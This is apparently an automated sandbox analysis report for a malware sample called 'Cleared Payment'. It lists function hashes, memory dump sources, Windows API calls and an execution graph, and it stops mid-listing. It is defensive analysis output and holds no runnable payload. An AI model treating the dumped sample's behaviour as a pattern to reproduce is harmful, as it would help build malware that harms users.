                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1858 4b61f70-4b61fd6 1859 4b61fe1-4b61fe8 1858->1859 1860 4b61fd8-4b61fde 1858->1860 1861 4b61ff3-4b6202b 1859->1861 1862 4b61fea-4b61ff0 1859->1862 1860->1859 1863 4b62033-4b62092 CreateWindowExW 1861->1863 1862->1861 1864 4b62094-4b6209a 1863->1864 1865 4b6209b-4b620d3 1863->1865 1864->1865 1869 4b620d5-4b620d8 1865->1869 1870 4b620e0 1865->1870 1869->1870 1871 4b620e1 1870->1871 1871->1871
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B62082
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 6847fc5dca35c32b2190c7a762762a367c941eeb3f6ca5febc39a0ef906b6c32
                                                            • Instruction ID: cb1251579316e938f00ebce8f24800392e698ede7b2294e30f8c0b45a552b35a
                                                            • Opcode Fuzzy Hash: 6847fc5dca35c32b2190c7a762762a367c941eeb3f6ca5febc39a0ef906b6c32
                                                            • Instruction Fuzzy Hash: A841B1B1D00349DFDB14CFA9C884ADEBBB5FF48310F24816AE819AB250D775A845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0253590D Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1872 253590d-253598c 1873 253598f-25359d9 CreateActCtxA 1872->1873 1875 25359e2-2535a3c 1873->1875 1876 25359db-25359e1 1873->1876 1883 2535a4b-2535a4f 1875->1883 1884 2535a3e-2535a41 1875->1884 1876->1875 1885 2535a51-2535a5d 1883->1885 1886 2535a60 1883->1886 1884->1883 1885->1886 1888 2535a61 1886->1888 1888->1888
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 025359C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 50c468e81a863a6e3d9395dec0d72e7572f926a76cb5043abf7ceeab54add328
                                                            • Instruction ID: 26509b784d94be68cf83527e91293c3db2d7c5bfd6fd9b937d926527cf5f6a6b
                                                            • Opcode Fuzzy Hash: 50c468e81a863a6e3d9395dec0d72e7572f926a76cb5043abf7ceeab54add328
                                                            • Instruction Fuzzy Hash: 6D41F271C0071DCBEB25CFA9C98478DBBB1BF48704F60806AD508AB251DBB5694ACF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04B60E5C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1889 4b60e5c-4b644cc 1892 4b644d2-4b644d7 1889->1892 1893 4b6457c-4b6459c call 4b60d3c 1889->1893 1894 4b6452a-4b64562 CallWindowProcW 1892->1894 1895 4b644d9-4b64510 1892->1895 1900 4b6459f-4b645ac 1893->1900 1897 4b64564-4b6456a 1894->1897 1898 4b6456b-4b6457a 1894->1898 1903 4b64512-4b64518 1895->1903 1904 4b64519-4b64528 1895->1904 1897->1898 1898->1900 1903->1904 1904->1900
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B64551
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 4a62396eeb9d5cf17dcbb069acf2be80be63e801339b8fe9e9b2cac257916dcc
                                                            • Instruction ID: 8f4f695cd5bbc30e070d0fc7d1e155281a262646fae05c788f4221c5266b9103
                                                            • Opcode Fuzzy Hash: 4a62396eeb9d5cf17dcbb069acf2be80be63e801339b8fe9e9b2cac257916dcc
                                                            • Instruction Fuzzy Hash: BF4107B59007099FDB14CF99C488AAABBF6FB88314F24C499E519A7321D774E841CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 025344E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1906 25344e4-25359d9 CreateActCtxA 1910 25359e2-2535a3c 1906->1910 1911 25359db-25359e1 1906->1911 1918 2535a4b-2535a4f 1910->1918 1919 2535a3e-2535a41 1910->1919 1911->1910 1920 2535a51-2535a5d 1918->1920 1921 2535a60 1918->1921 1919->1918 1920->1921 1923 2535a61 1921->1923 1923->1923
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 025359C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 7f5991b881be722574cc39c2d7523295ff1e4c5593ecad824c9115396599a8f3
                                                            • Instruction ID: aa83509c6e1a4e0616629a5743d7890d2a7a0d5ff03dfbfd1bfd4d02c304d261
                                                            • Opcode Fuzzy Hash: 7f5991b881be722574cc39c2d7523295ff1e4c5593ecad824c9115396599a8f3
                                                            • Instruction Fuzzy Hash: 22410471C0071DCBEB25CFA9C98478EBBF5BF48704F60806AD508AB251DBB56949CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02535A84 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1924 2535a84-2535a90 1925 2535a42-2535a47 1924->1925 1926 2535a92-2535b14 1924->1926 1929 2535a4b-2535a4f 1925->1929 1930 2535a51-2535a5d 1929->1930 1931 2535a60 1929->1931 1930->1931 1933 2535a61 1931->1933 1933->1933
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0feef98e81598f3590a4474ebb5eed894c5abaa2e6614fd581d8a298fc9a498a
                                                            • Instruction ID: 808a02ab22bbefcd664349d49fb7df4f4f87885efe60b00beeefcf65b3e2fcc4
                                                            • Opcode Fuzzy Hash: 0feef98e81598f3590a4474ebb5eed894c5abaa2e6614fd581d8a298fc9a498a
                                                            • Instruction Fuzzy Hash: 2231AE71805349CFEB02CFA8C8957EDBBF0FF4A314F94618AC4056B252E774990ACB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0253E2E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1934 253e2e0-253e2e6 1935 253e2e8-253e37c DuplicateHandle 1934->1935 1936 253e385-253e3a2 1935->1936 1937 253e37e-253e384 1935->1937 1937->1936
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0253E36F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: fb43b9701d50d0c04650a4cd1970a8e9101fe5e5d1069290b678ea22c3561a1f
                                                            • Instruction ID: ac6fc21fac96c155a41e53e903561c53f883d4b1bcf6b34cce710008d9050b6c
                                                            • Opcode Fuzzy Hash: fb43b9701d50d0c04650a4cd1970a8e9101fe5e5d1069290b678ea22c3561a1f
                                                            • Instruction Fuzzy Hash: 9121E3B5901249AFDB10CF9AD984ADEBBF9FF48324F14801AE914A3310D378A954CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0253E2E8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1940 253e2e8-253e37c DuplicateHandle 1941 253e385-253e3a2 1940->1941 1942 253e37e-253e384 1940->1942 1942->1941
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0253E36F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: b080afe8a4d8a261c0d605c5880fccb73538918a74649c07d1715569b890f47a
                                                            • Instruction ID: 7276b18937f842dad39867b0d0918e4d5227e0823ec5e3c045ffa8289fee300d
                                                            • Opcode Fuzzy Hash: b080afe8a4d8a261c0d605c5880fccb73538918a74649c07d1715569b890f47a
                                                            • Instruction Fuzzy Hash: A021B3B59002499FDB10CF9AD984ADEBBF4FF48320F14845AE914A3250D374A954CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0253C281 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1945 253c281-253c2c8 1946 253c2d0-253c2ff LoadLibraryExW 1945->1946 1947 253c2ca-253c2cd 1945->1947 1948 253c301-253c307 1946->1948 1949 253c308-253c325 1946->1949 1947->1946 1948->1949
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0253C101,00000800,00000000,00000000), ref: 0253C2F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: e48911565cd9ebb8470b07bf7557c76129fe0271019f49ff6b7207d59bf2b26a
                                                            • Instruction ID: 7aeff4f90323b11ca629fc3a03026be1733a32d608ba821a6ba7f58e2a1d0626
                                                            • Opcode Fuzzy Hash: e48911565cd9ebb8470b07bf7557c76129fe0271019f49ff6b7207d59bf2b26a
                                                            • Instruction Fuzzy Hash: 041114B6C003498FDB10CF9AC484ADEFBF4FB98714F10852AE559A7200C3B5A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0253B858 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0253C101,00000800,00000000,00000000), ref: 0253C2F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 25a5254e61ad90b5a68b13fd6485b5f1ebca533f1614fd59fdd6f6022795c86a
                                                            • Instruction ID: b9060d185db701df17b3bcb9f1cb107a539d34d9ea297d3888ff4daa83ccbae5
                                                            • Opcode Fuzzy Hash: 25a5254e61ad90b5a68b13fd6485b5f1ebca533f1614fd59fdd6f6022795c86a
                                                            • Instruction Fuzzy Hash: C51144B68003498FDB10CF9AC444ADEFBF4FB88710F10842AE919B7200C3B5A544CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0253C020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0253C086
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 8dcf1c9780a5c9c3ee28e9a8fbfa16f5f97ba947eff146c408b99218436095e9
                                                            • Instruction ID: f61c249acf9f7708664fc30d842f6f5e26421c10f3215757cd41afb6795cfaa2
                                                            • Opcode Fuzzy Hash: 8dcf1c9780a5c9c3ee28e9a8fbfa16f5f97ba947eff146c408b99218436095e9
                                                            • Instruction Fuzzy Hash: 4F110FB6C003498FCB10CF9AC484BDEFBF4BB88624F10856AD418B7210C3B9A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008DD4C4 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106415361.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8dd000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa58aca9ab0f345a2ce2a0f830c1cba9a4ddf3421a1662ff965ad9cec640d6b3
                                                            • Instruction ID: 1f8808f790f84327f90c4b57c0ba7bf6c6f6456fc52f406b9c66fd476595f0e5
                                                            • Opcode Fuzzy Hash: fa58aca9ab0f345a2ce2a0f830c1cba9a4ddf3421a1662ff965ad9cec640d6b3
                                                            • Instruction Fuzzy Hash: 5821C472504344EFDB15DF14E9C0B26BF75FB84318F24C66AD9094A356C336D856CAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008ED01C Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106475309.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8ed000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94bbff2277879122c323f2e2069421b2d3b566b979021d37f2058fa47864bf01
                                                            • Instruction ID: 9036f8f1048877f5b8d63567fde320fc4e7cf0e0bf9f23d0f8b2ec630b817e29
                                                            • Opcode Fuzzy Hash: 94bbff2277879122c323f2e2069421b2d3b566b979021d37f2058fa47864bf01
                                                            • Instruction Fuzzy Hash: EC213475604784EFCB14DF15D9C0B26BB61FB85318F28C56DD90A8B292C37BD80BCA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008ED1D4 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106475309.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8ed000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dbfe4b1ebc6f49c06abe04b7de942702c57d93b98763b7e6f6e6bd5320fe6e5a
                                                            • Instruction ID: 889c85030dd5f2c7572fcc8063b5321efa200b7870c461fe2c6881fc5758b09d
                                                            • Opcode Fuzzy Hash: dbfe4b1ebc6f49c06abe04b7de942702c57d93b98763b7e6f6e6bd5320fe6e5a
                                                            • Instruction Fuzzy Hash: 54214675504384EFDB04DF11D9C0B26BBA1FB85318F20C56DEA098B292C37AE80ACA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008ED006 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106475309.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8ed000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53516a3a7b376e3d819c7c5d2fc571736511908c3a262f57b7aa1c133ee001a9
                                                            • Instruction ID: 4463e66e75affcd41192b4ad7005490044700ae55e09e0b645d4a5e2f32ae45b
                                                            • Opcode Fuzzy Hash: 53516a3a7b376e3d819c7c5d2fc571736511908c3a262f57b7aa1c133ee001a9
                                                            • Instruction Fuzzy Hash: 77214F755087C49FCB02CF14D994715BF71FB46314F28C5EAD8498B2A7C33A985ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008DD4BF Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106415361.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8dd000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                            • Instruction ID: 92a0db5b1a7b25b2643928c23187e3ce9a5099dda80e96e0bacebcb00eb07860
                                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                            • Instruction Fuzzy Hash: 6E11B176504380DFCB15CF10D5C4B16BF71FB94328F24C6AAD8494B656C33AD856CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008ED1CF Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106475309.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8ed000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction ID: 22fc9bbff55712c26b86e587493594a65213c2b9f107047f812747efb1e57442
                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction Fuzzy Hash: A711BB79504380DFCB01CF10C6C0B15BBA2FB85314F24C6A9D9498B2A6C33AE80ACB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008DD745 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106415361.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8dd000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8febbb04c05e7e3dbde4c5143323f084797e13c7facbd3da8e817c2d5dfdcb8d
                                                            • Instruction ID: 7bb4767df2b9984be885c1b08131e987a74ec330e8d47426b86ff5e7826cbb58
                                                            • Opcode Fuzzy Hash: 8febbb04c05e7e3dbde4c5143323f084797e13c7facbd3da8e817c2d5dfdcb8d
                                                            • Instruction Fuzzy Hash: DD01F7714053449AE7104E26CDC4B26BF98FF41324F18C69BED098A386C6799840CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008DD744 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106415361.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8dd000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b8bbf3ea59e452f14f3835f18781553003e25153a02dd14735c9199e37f45b06
                                                            • Instruction ID: d9e7b5fff0c7215ea1512adaebc243450edfc1d07bff51c61c18f3b7ea8aa27a
                                                            • Opcode Fuzzy Hash: b8bbf3ea59e452f14f3835f18781553003e25153a02dd14735c9199e37f45b06
                                                            • Instruction Fuzzy Hash: C8F062714053449AE7108E16D9C4B62FF98EB91734F18C59BED0C4A286C2799844CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 02537708 Relevance: .3, Instructions: 318COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2818b31c7fb479b32096d39be5518bec608ac96cd0dc18c120cf8544e16167b
                                                            • Instruction ID: 46ff34b2f0077994923b99543dc4ce6ba83b914860bdde8e94bd04844451c959
                                                            • Opcode Fuzzy Hash: b2818b31c7fb479b32096d39be5518bec608ac96cd0dc18c120cf8544e16167b
                                                            • Instruction Fuzzy Hash: A712A6B2C917658BD710CF65E96C1893BB1BB41328BD04A19D2611F2E1F7B4126EEF4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0860DD97 Relevance: .3, Instructions: 272COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c5f01318bcdf405066c72946bebbb5e4f33d1c597b9b9838faa8795cf36d8e7a
                                                            • Instruction ID: b5677872a337147d055e5282cd54494642944042f06e255beb31ee0fa6790bd1
                                                            • Opcode Fuzzy Hash: c5f01318bcdf405066c72946bebbb5e4f33d1c597b9b9838faa8795cf36d8e7a
                                                            • Instruction Fuzzy Hash: 55D10671910A5ACADB04EB64D990A99B7B1FFD5300F10D79AE00977221FBB06EC9CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0860DDA8 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f822c9107f7b6d8591b45b8cc554e030b735e786be81b2013bb7b0e3ab2368a
                                                            • Instruction ID: a2c204b2dc746bd388fe72427db23c8a25dc10341d67968504727f3c4d1b3279
                                                            • Opcode Fuzzy Hash: 7f822c9107f7b6d8591b45b8cc554e030b735e786be81b2013bb7b0e3ab2368a
                                                            • Instruction Fuzzy Hash: DBD1F671920A5ACADB04EB64D950A99B7B1FFD5300F10D79AE40937221FBB06EC9CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04B60288 Relevance: .3, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e82e2f8fd20ab5420eed5df485fc908739aa4ccb365493c2ace3f99bd9f33c41
                                                            • Instruction ID: 2543495bc261ac51235fb1eb2f833a64aa045840c5059c4092ffca40002f23ef
                                                            • Opcode Fuzzy Hash: e82e2f8fd20ab5420eed5df485fc908739aa4ccb365493c2ace3f99bd9f33c41
                                                            • Instruction Fuzzy Hash: E3A16D32E0021A8FCF16DFA5C84459EB7F2FF84300B1545AAE806AB265DB75E956CF80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 025376F8 Relevance: .2, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e35cb6e82a2c093e96f103f2785c65d51b519616a06af43a2cf6b3b926c46773
                                                            • Instruction ID: 3c77130fddb14e98e283fed1f009df66aca54e3b659df165130664c62d888d98
                                                            • Opcode Fuzzy Hash: e35cb6e82a2c093e96f103f2785c65d51b519616a06af43a2cf6b3b926c46773
                                                            • Instruction Fuzzy Hash: 7BC13CB1C917658BD710CF25E8681893BB1BB84324FD04B19D1612F2E0FBB4226EEF48
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:10.7%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:144
                                                            Total number of Limit Nodes:14
                                                            execution_graph 40301 6ba2e08 40302 6ba2e4e GetCurrentProcess 40301->40302 40304 6ba2e99 40302->40304 40305 6ba2ea0 GetCurrentThread 40302->40305 40304->40305 40306 6ba2edd GetCurrentProcess 40305->40306 40307 6ba2ed6 40305->40307 40308 6ba2f13 40306->40308 40307->40306 40309 6ba2f3b GetCurrentThreadId 40308->40309 40310 6ba2f6c 40309->40310 40311 2bc0848 40312 2bc084e 40311->40312 40313 2bc091b 40312->40313 40318 2bc1488 40312->40318 40323 2bc138b 40312->40323 40328 6ba1cf0 40312->40328 40332 6ba1d00 40312->40332 40319 2bc1396 40318->40319 40320 2bc1484 40319->40320 40321 2bc1488 GlobalMemoryStatusEx 40319->40321 40336 2bc7eb0 40319->40336 40320->40312 40321->40319 40325 2bc1396 40323->40325 40324 2bc1484 40324->40312 40325->40324 40326 2bc1488 GlobalMemoryStatusEx 40325->40326 40327 2bc7eb0 GlobalMemoryStatusEx 40325->40327 40326->40325 40327->40325 40329 6ba1d0f 40328->40329 40349 6ba1494 40329->40349 40333 6ba1d0f 40332->40333 40334 6ba1494 2 API calls 40333->40334 40335 6ba1d30 40334->40335 40335->40312 40337 2bc7eba 40336->40337 40338 2bc7ed4 40337->40338 40341 6bbfa12 40337->40341 40345 6bbfa20 40337->40345 40338->40319 40342 6bbfa35 40341->40342 40343 6bbfc46 40342->40343 40344 6bbfc61 GlobalMemoryStatusEx 40342->40344 40343->40338 40344->40342 40346 6bbfa35 40345->40346 40347 6bbfc46 40346->40347 40348 6bbfc61 GlobalMemoryStatusEx 40346->40348 40347->40338 40348->40346 40350 6ba149f 40349->40350 40353 6ba2c04 40350->40353 40352 6ba36b6 40352->40352 40354 6ba2c0f 40353->40354 40355 6ba3ddc 40354->40355 40358 6ba5a5e 40354->40358 40362 6ba5a60 40354->40362 40355->40352 40359 6ba5a81 40358->40359 40360 6ba5aa5 40359->40360 40366 6ba5c10 40359->40366 40360->40355 40363 6ba5a81 40362->40363 40364 6ba5aa5 40363->40364 40365 6ba5c10 2 API calls 40363->40365 40364->40355 40365->40364 40367 6ba5c1d 40366->40367 40368 6ba5c56 40367->40368 40370 6ba492c 40367->40370 40368->40360 40371 6ba4937 40370->40371 40373 6ba5cc8 40371->40373 40374 6ba4960 40371->40374 40373->40373 40375 6ba496b 40374->40375 40381 6ba4970 40375->40381 40377 